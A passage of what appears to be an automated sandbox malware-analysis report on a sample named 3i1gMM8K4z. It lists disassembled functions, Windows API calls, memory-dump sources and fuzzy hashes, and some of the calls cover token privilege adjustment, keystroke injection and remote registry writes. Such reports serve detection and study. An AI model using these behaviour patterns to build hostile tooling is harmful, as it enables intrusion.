                                                                                                                            • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                            • Instruction Fuzzy Hash: 0BE092B0504B005BD7388A24DC00BA377E1AB05314F04081DF6AA83241EBA278429B59
                                                                                                                            Function 0143FC58 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0143FC63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                            • Instruction ID: a5375e41b22a9f62c580247a60675b2bb6d634ca7ea7572f93131364500435dc
                                                                                                                            • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                            • Instruction Fuzzy Hash: 9EE08C30D85208EBEB10CBA8C908AEA73A8BB4D320F404666ED16C32A0D5308A08D696
                                                                                                                            Function 0143FC28 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0143FC33
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                            • Instruction ID: ea62ede2da6f603af3b8557fc94bf9ef6f0f111e14948e1ad2aea361cafa7298
                                                                                                                            • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                            • Instruction Fuzzy Hash: 96D0A730D4520CEBCB11CFB89D049DE73A8F749320F104765FD15C32C0D5319A049751
                                                                                                                            Function 00F0525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wfsopen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 197181222-0
                                                                                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                            • Instruction ID: 66d7925799571e8f4df7c6b053b005a6b6830b85abd7f8403284c4757556a8a7
                                                                                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                            • Instruction Fuzzy Hash: D6B0927644020C77CE112A82EC02A4A3B199B42B64F408020FB0C181A2A6B7A664AA89
                                                                                                                            Function 01441614 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 01441629
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                            • Instruction ID: 7174750085a6773d4b722370dbc3383a522538d328d2a56ff08dcb5c3e98a405
                                                                                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                            • Instruction Fuzzy Hash: 6DE0BF7494010DEFDB00DFA4D6496ED7BB4EF04701F1005A1FD05D7690DB309E548A66
                                                                                                                            Function 01441618 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000001F4), ref: 01441629
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                            • Instruction ID: 4dec1acccf99125d954d189f97ca121d6640d0e4217600e24f943c5529913843
                                                                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                            • Instruction Fuzzy Hash: 42E0E67494010DDFDB00DFB4D6496ED7BB4EF04701F100161FD05D2280D6309D508A66

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00F6CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F6CB37
                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F6CB95
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F6CBD6
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F6CC00
                                                                                                                            • SendMessageW.USER32 ref: 00F6CC29
                                                                                                                            • _wcsncpy.LIBCMT ref: 00F6CC95
                                                                                                                            • GetKeyState.USER32(00000011), ref: 00F6CCB6
                                                                                                                            • GetKeyState.USER32(00000009), ref: 00F6CCC3
                                                                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F6CCD9
                                                                                                                            • GetKeyState.USER32(00000010), ref: 00F6CCE3
                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F6CD0C
                                                                                                                            • SendMessageW.USER32 ref: 00F6CD33
                                                                                                                            • SendMessageW.USER32(?,00001030,?,00F6B348), ref: 00F6CE37
                                                                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F6CE4D
                                                                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F6CE60
                                                                                                                            • SetCapture.USER32(?), ref: 00F6CE69
                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00F6CECE
                                                                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F6CEDB
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F6CEF5
                                                                                                                            • ReleaseCapture.USER32 ref: 00F6CF00
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F6CF3A
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00F6CF47
                                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F6CFA3
                                                                                                                            • SendMessageW.USER32 ref: 00F6CFD1
                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F6D00E
                                                                                                                            • SendMessageW.USER32 ref: 00F6D03D
                                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F6D05E
                                                                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F6D06D
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F6D08D
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00F6D09A
                                                                                                                            • GetParent.USER32(?), ref: 00F6D0BA
                                                                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F6D123
                                                                                                                            • SendMessageW.USER32 ref: 00F6D154
                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00F6D1B2
                                                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F6D1E2
                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F6D20C
                                                                                                                            • SendMessageW.USER32 ref: 00F6D22F
                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00F6D281
                                                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F6D2B5
                                                                                                                              • Part of subcall function 00EE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EE25EC
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F6D351
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                            • String ID: @GUI_DRAGID$F
                                                                                                                            • API String ID: 3977979337-4164748364
                                                                                                                            • Opcode ID: d9090fe5844cc71b8c10cc58064b820ebe332b0a45cd371d94fdd4adf11a51a9
                                                                                                                            • Instruction ID: 028996c8d6799a45a4b4dc9733f5941348931a49af418bf9d881da4a609b28d9
                                                                                                                            • Opcode Fuzzy Hash: d9090fe5844cc71b8c10cc58064b820ebe332b0a45cd371d94fdd4adf11a51a9
                                                                                                                            • Instruction Fuzzy Hash: B142DB74A04284AFDB20CF28D844BBABBE5FF89720F140519F6E5972B1C771D844EB92
                                                                                                                            Function 00F67DDB Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F684D0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: %d/%02d/%02d
                                                                                                                            • API String ID: 3850602802-328681919
                                                                                                                            • Opcode ID: fd07a625c4a5aac70449047578cd69813928bb19213178633e4e97159f69f595
                                                                                                                            • Instruction ID: caa5186a78f7e2c08fca19676d7f2a251b399c1a9ef586b94780426ea8d42a1b
                                                                                                                            • Opcode Fuzzy Hash: fd07a625c4a5aac70449047578cd69813928bb19213178633e4e97159f69f595
                                                                                                                            • Instruction Fuzzy Hash: 7512C371904209ABEB249F24DC49FAF7BB4EF45350F10422DF516EA2E1DF748946EB60
                                                                                                                            Function 00EF6F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID: 3c$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
                                                                                                                            • API String ID: 1357608183-3681475764
                                                                                                                            • Opcode ID: 4af3cc861ec4f7e5e8966fb571644d8ada59ba4650d88e5081db7aa0a9186ba0
                                                                                                                            • Instruction ID: d1f5a9a515d827083d85b6f15fa6f64ed44bed0c29bed01eb21cf262cb0990ae
                                                                                                                            • Opcode Fuzzy Hash: 4af3cc861ec4f7e5e8966fb571644d8ada59ba4650d88e5081db7aa0a9186ba0
                                                                                                                            • Instruction Fuzzy Hash: 7C939175E04219DBDB24CF98C881BBDB7B1FF48720F25816AE945EB281E7709E81DB50
                                                                                                                            Function 00EE48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00EE48DF
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F1D665
                                                                                                                            • IsIconic.USER32(?), ref: 00F1D66E
                                                                                                                            • ShowWindow.USER32(?,00000009), ref: 00F1D67B
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00F1D685
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F1D69B
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F1D6A2
                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F1D6AE
                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F1D6BF
                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F1D6C7
                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F1D6CF
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00F1D6D2
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1D6E7
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F1D6F2
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1D6FC
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F1D701
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1D70A
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F1D70F
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F1D719
                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F1D71E
                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00F1D721
                                                                                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 00F1D748
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 4125248594-2988720461
                                                                                                                            • Opcode ID: 283496f95ce87a3500d2732ff5d8915c5c81698982613b23db4a06f4d8607782
                                                                                                                            • Instruction ID: df423dda2bf71b8a31ec9cbe55d3793c388713690be45883432d56ab5133aa8f
                                                                                                                            • Opcode Fuzzy Hash: 283496f95ce87a3500d2732ff5d8915c5c81698982613b23db4a06f4d8607782
                                                                                                                            • Instruction Fuzzy Hash: FA315271A4031CBBEB216B619C49FBF7E6CEB44B60F144025FA05EA1D1CAB15D41BEA1
                                                                                                                            Function 00F38310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F3882B
                                                                                                                              • Part of subcall function 00F387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F38858
                                                                                                                              • Part of subcall function 00F387E1: GetLastError.KERNEL32 ref: 00F38865
                                                                                                                            • _memset.LIBCMT ref: 00F38353
                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F383A5
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00F383B6
                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F383CD
                                                                                                                            • GetProcessWindowStation.USER32 ref: 00F383E6
                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00F383F0
                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F3840A
                                                                                                                              • Part of subcall function 00F381CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F38309), ref: 00F381E0
                                                                                                                              • Part of subcall function 00F381CB: CloseHandle.KERNEL32(?,?,00F38309), ref: 00F381F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                            • String ID: $default$winsta0
                                                                                                                            • API String ID: 2063423040-1027155976
                                                                                                                            • Opcode ID: 1ea6b020c42b01bdb553cd2a381e2ca977bf1ce4a0e73a3bf3f85c7546eae0f6
                                                                                                                            • Instruction ID: e2fe34301a2e07db7cd0e3d7ca182bcb96e2f36764f08bc78991d6951c4a8d01
                                                                                                                            • Opcode Fuzzy Hash: 1ea6b020c42b01bdb553cd2a381e2ca977bf1ce4a0e73a3bf3f85c7546eae0f6
                                                                                                                            • Instruction Fuzzy Hash: BE815A71D00309AFDF519FA4DC45AEE7B79AF043A4F184169F820A7261DB798E16EB20
                                                                                                                            Function 00F4C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F4C78D
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4C7E1
                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F4C806
                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F4C81D
                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F4C844
                                                                                                                            • __swprintf.LIBCMT ref: 00F4C890
                                                                                                                            • __swprintf.LIBCMT ref: 00F4C8D3
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            • __swprintf.LIBCMT ref: 00F4C927
                                                                                                                              • Part of subcall function 00F03698: __woutput_l.LIBCMT ref: 00F036F1
                                                                                                                            • __swprintf.LIBCMT ref: 00F4C975
                                                                                                                              • Part of subcall function 00F03698: __flsbuf.LIBCMT ref: 00F03713
                                                                                                                              • Part of subcall function 00F03698: __flsbuf.LIBCMT ref: 00F0372B
                                                                                                                            • __swprintf.LIBCMT ref: 00F4C9C4
                                                                                                                            • __swprintf.LIBCMT ref: 00F4CA13
                                                                                                                            • __swprintf.LIBCMT ref: 00F4CA62
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                            • API String ID: 3953360268-2428617273
                                                                                                                            • Opcode ID: 2d219ef782530690096655e5bd85b09bd3e60d76a51650e8aac0104cf5fd9487
                                                                                                                            • Instruction ID: df514b92203c02664fb2027fb7d7fce10f4b335bedd9147db340be587815b717
                                                                                                                            • Opcode Fuzzy Hash: 2d219ef782530690096655e5bd85b09bd3e60d76a51650e8aac0104cf5fd9487
                                                                                                                            • Instruction Fuzzy Hash: C3A14DB2408348ABC710EFA5CC85DAFB7ECEF85704F401929F59597192EB35DA08CB62
                                                                                                                            Function 00F4EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F4EFB6
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4EFCB
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4EFE2
                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F4EFF4
                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00F4F00E
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F4F026
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F031
                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00F4F04D
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F074
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F08B
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F4F09D
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00F98920), ref: 00F4F0BB
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F4F0C5
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F0D2
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F0E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1803514871-438819550
                                                                                                                            • Opcode ID: 0a8057cf41c8291dee7ab43a83f1cef4d577d111575e7b74d050fafad92ee65e
                                                                                                                            • Instruction ID: e9a55e5473999618bec346f712ebabc82b7e527d63e5330abccd26ac580cad68
                                                                                                                            • Opcode Fuzzy Hash: 0a8057cf41c8291dee7ab43a83f1cef4d577d111575e7b74d050fafad92ee65e
                                                                                                                            • Instruction Fuzzy Hash: 3431E53290120D6ADB14DBA8EC49AEE7BAC9F85360F140176EC19D20A1DB70DA48FE61
                                                                                                                            Function 00F60857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F60953
                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F6F910,00000000,?,00000000,?,?), ref: 00F609C1
                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F60A09
                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F60A92
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00F60DB2
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F60DBF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
